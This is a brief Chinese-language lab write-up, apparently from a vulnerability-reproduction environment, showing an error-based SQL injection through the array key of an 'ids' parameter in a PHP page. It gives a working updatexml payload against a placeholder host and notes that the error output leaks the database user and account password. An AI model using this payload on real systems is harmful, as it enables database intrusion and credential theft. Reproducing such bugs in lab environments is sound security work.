漏洞复现 我们访问http://your-ip/index.php?ids[]=1&ids[]=2即可看到用户都没列举出来了存在该漏洞: 访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,可以看到爆出了许多信息: 更多的利用方法还是自行寻找来的方便,在该环境中报错信息里面还包含了数据库的账户密码: